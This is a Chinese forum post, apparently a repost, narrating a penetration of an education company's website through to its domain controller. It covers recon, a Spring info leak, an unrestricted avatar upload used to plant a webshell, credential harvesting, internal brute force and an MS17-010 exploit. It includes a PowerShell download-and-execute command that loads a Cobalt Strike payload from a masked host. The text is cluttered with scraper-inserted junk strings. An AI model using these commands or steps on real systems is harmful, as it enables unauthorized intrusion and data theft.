中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

% y; u* ^# `! n$ \& E 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 , ]! w1 T w. Q5 q3 `: B: v7 t

( q% P$ J( c) u' i

5 f: j* l) j) L8 Q2 I. p3 H8 W0 o   ! l# x$ V$ O- R1 L+ {+ m0 ]

( a, T m) l1 c( r* p$ D

8 q) }# J- m9 K7 A5 ~8 p2 J F W( T 正文 ' W8 d, w1 z9 M: c4 J3 k& O

; h- H6 ~7 y9 p5 @, j

$ F& k& K# {( K- s- V8 y) ?( a   5 X- m% f5 y! j

1 y4 {0 y2 d+ J/ {3 D

- ^% I, M, U7 C: K3 v5 G 目标:www.xxxx.com(一家教育机构)
9 ?" x9 B1 U$ w打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能. v; C7 E$ S' [! m" \; n

, P# A( ?! D! W

; {. v+ C; O, C4 f% e( I" x. @ vshapes= / e& Q: C% m8 D7 O ~) {' O

7 B6 H4 [$ C$ V6 i/ C

" N1 q; _7 J- R! E, s 进行了简单的信息搜集
% H7 b9 w p+ m! \: }
/ l) I9 F/ X: g. h$ e, y3 D! {1 y. r- u% H; c/ H

; |" x+ x1 V8 f6 D

! r! Q! r% X& W, |% L! b 子域名搜集 + A9 E/ y$ P. }8 L5 C6 t6 `

/ z3 Q) S, [% m. r8 M+ k

2 ]4 r6 N' m7 Q vshapes= ; j5 I2 |8 R- k5 a

Z0 S J7 W* f0 d3 B

- x/ Z- o3 G7 q: K! ^- A fofa找资产
5 r9 L) b% O# e4 ?: C" A
3 m6 J- H9 z: T0 Y' a6 V & C& E( u* {* ?/ ~5 U

$ [: _0 E& U( Y. p6 }

h5 p% Q1 J m/ ^ vshapes=; r' j. _8 I- Q5 N# A$ O1 o

6 Z. J% [9 k4 Z2 f5 m$ i5 ^

. [2 l% G/ i* ? K 一共七个资产。去重之后只有两个。
2 ~+ f& r- O+ f
$ O) B0 ^7 l" v7 V% |9 \+ N3 s& Q7 i3 B& z

0 N3 ^6 ` o" ?3 k8 e8 p' ?2 a

) v$ {3 c5 { l/ b* K7 j! o 目录探测 + v. s% y' b3 Q$ e. R5 G) m

* E0 g; j+ w* q2 f0 g1 Z

+ Y; R8 {9 H4 p: r$ S9 f0 l+ f) C' ^ vshapes= # l* i( K* \5 W( o

- f8 X/ w9 D: s( n

! c+ S5 _' s. j2 H 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
$ d* }' G- M5 n, S9 J4 J) {9 l
6 d- p% [9 Z$ d2 H' @4 Y# z/ ^& D9 ]# z. k+ F4 v

2 P. f3 c- K' N0 G

5 R, z+ i' y% r1 c V$ D! D 我又尝试了通过修改返回包来绕过登录界面. U& R6 G9 u8 B& F" d" h2 B" Q- n

( L; i/ ~* h3 a

! \' l. x6 C4 J vshapes= : o$ R8 @% D/ p( R

/ X9 L" @9 I, Y! b

$ `, h( r5 \8 w) _9 R 还是不行,尝试注入无果 . ~6 b# _; g6 ~! K1 f7 B

+ H4 a; ~, M: |7 R& j% t/ V" }

8 E# A* y; u5 A& C vshapes= 2 w& ?$ ^4 M, x- j+ x

6 U# g: f; B1 t3 I& Q

' _# L/ k1 ?% i/ e- s" ~2 q 不过我目录探测出了一处Spring信息泄露
6 |/ n- K" y" ~/ J* N/ _
% u0 c ~4 z; t3 `( Y 0 q+ i* t) z$ l# v+ F: F

$ k1 H" K0 t8 ~: m& \, p: _

1 B4 K {4 |2 K% ~ vshapes=! n+ J- b" E( K1 z( l. z

' o: m# x; U7 p

* A1 V7 @. r; p- }1 D- P+ O 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录2 `$ I b+ A8 ?

3 R( P7 B- ?9 Y5 K: v# Y

. d4 P; N6 R5 _ vshapes=# n# F9 b3 Q+ f8 E9 {, f; t3 k9 R* p

1 v2 _: }) `1 V* N( q

4 d. C; R* v1 a 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。1 E2 B' h/ r9 u' h

5 }6 g8 u( D( k" J; E3 X U! ?

5 ~2 r0 s8 _' A0 ] vshapes= ! n3 d/ `. l* f/ m1 O

! m' y, v! T4 Z2 J3 _4 r

4 d. t4 f9 G* m9 @; \ 获取有些师傅到这一步就手机抓包电脑测了。 3 V& D' m* s- @3 L

( b- ^! E s6 l. A/ [0 L4 n9 \

# `3 k0 {7 V% O k: `' E% k Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 % A- V( Q0 I6 y% u# E9 [

$ G& b/ E$ f( O9 F, c" z4 @. c

- N5 ]: K! y% u7 y6 B2 ^. } 其中在一个公众号发现了小程序,可以进行注册。& L1 ]+ V' a/ V7 T6 H9 H; \# o

' q. p% W: u) [ l- w' s8 p

: m) q# C8 ~3 [) @3 [; P$ T3 r1 n 看到了头像上传,尝试上传获取WebShell ) N- o1 j% F( A

9 p* n5 b M0 W! y. i9 |. `

- m2 C0 R( ?$ p5 h' H: Q) g: ?/ o: i vshapes= & R- K! Y" |: K1 s

$ j4 H* Q3 c7 V! T

. V* N2 B$ v+ r& a# q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 6 d. ~: i1 G% `8 ?6 Q6 A, C- N! R0 N

$ z w' a" Q: r

I* t0 K" R$ k: n( q: _* {# n) X vshapes=; @: u8 V# Y; R+ B& _2 }7 L

6 P C9 A6 K/ E9 U& o+ o9 @

% ?7 l9 w5 `7 {- s6 A 然后上了大马$ R% N$ o- r: W. k2 A4 [+ N) }5 P

6 I3 i. T9 G9 X/ @( t

: \6 \# F( p" L* e9 v! n5 v+ m vshapes=) i4 x' X- c: W# x5 [9 Z2 m

/ @4 m U+ S$ h% y7 l

7 z6 b% R) u. E) z. \3 M% \ vshapes=" z L- G; U- F. T% c- q7 g

6 \: ?% @1 _. t/ G* a, ~

' |' J7 D# `! c. { 通过翻找文件发现数据库账号密码7 a& g7 \/ T. y K! @

# u0 r9 _% [; K! {# Q

2 s; n/ w, h5 C# L) n1 d vshapes=6 o- L$ d+ @$ a- N D

2 q) @/ U$ R l6 Y0 S# X& m7 ~

$ Q' V' q; V+ i3 [8 s+ T+ r --内网渗透1 O* q8 Y# P, `5 R: }. y/ D

. ~. u3 N8 R7 G' i% @ c- A# r1 C

) P6 ]* j0 w- \$ n; M3 M7 Q B5 ? 直接通过powershell执行 cs上线 $ K+ ~8 [" i$ R

! j: t2 W9 y7 J, k7 B4 O; y

! a$ \* G$ e7 r; l! E2 J' r z powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" ' R: _6 r: ^3 T( g5 B$ _' Z

% Z) ^/ t0 R! G A$ X

- {" I6 y; F4 n vshapes=: M% z: d& R8 o% ~! b7 L" }& j, w

, m6 r5 U. i. I y# C& Y2 C

8 F, ?; O$ R# s- D: u& K 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破' }6 L; l: G+ h6 u# J

9 ?) j( }$ ?) }. i; p1 C, c- f$ n% W9 w

3 n& I7 z7 ?$ m( N: w( z( | vshapes= . O: m. @- z$ ?, Q

1 ^: [' K+ p! A% q2 a

+ r6 l5 q3 w: z$ b' h6 `5 C 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
k2 Z- ]1 {( l" S _, _# [
% o3 O y+ D+ w1 ]
3 i2 ]/ {9 ^( N 9 X, a( \) \0 s

7 N$ Y; g. P( v% b B1 Q+ k, K

, v$ T% `) E9 U! V" q% p vshapes= # J9 v; s* h4 u8 y% c6 n: S

9 W+ A* I& [5 F; O0 @

4 n9 @( k, X0 M# n) y 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# S# ^- p8 r( k5 i
) N" X- x$ `+ x* @! o2 j0 }$ X+ a; S( a- Y" c

: O5 h; Q. I: l! }1 n' H

2 \% {; u; [4 O9 M: ^. F vshapes=8 o, g' s9 g; J/ q! D

P( b* y& H3 E; y7 S2 n: q

+ V. v; c8 ^# d- D g+ q' S9 J
& W) R2 N) ^. H1 y2 U$ F
$ ?2 V7 ~* L: H ?. I / Z$ _- N: f3 Q; g% x: C, n" F6 l

# o) ^* O* R; K& G6 o4 E

. E# D' ^; ?" h& ~+ v6 ?6 `/ j% B  ! F$ Z' e0 ]- j' s/ A2 H

* k, ^* v5 X4 V6 {

8 |* u5 ~) Q* ~/ c5 ]- V 小结: Z! t3 x/ ^ C! _7 }

# f4 m }* p. g1 b6 O6 \

0 ?' B2 ]5 j- x% q- C5 \# R   4 ]6 _( X" r% D: H5 U1 M) \

, r6 i. C- H0 F+ D+ }. t4 N* Z+ p( \

/ s7 b5 u$ W" L3 b: N8 P9 m 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! ( Z+ M" S4 i, R, y

# U( d8 |, f& `0 f7 \! n5 o2 r

! q+ @7 J/ ?" M, y- j  . q: s9 ?( H3 ~3 v

7 C- ~. I0 ?& _, w* Y, r% V" ^. b: k" F( O

6 U- O: m# t3 s: x+ x% a5 s 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html; B# M8 Y" @: C

% b2 x( Y n8 _

1 B, k4 ?4 e& v+ K! _, O, P9 d  ; H" A' q, u" v, K% {0 Q





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2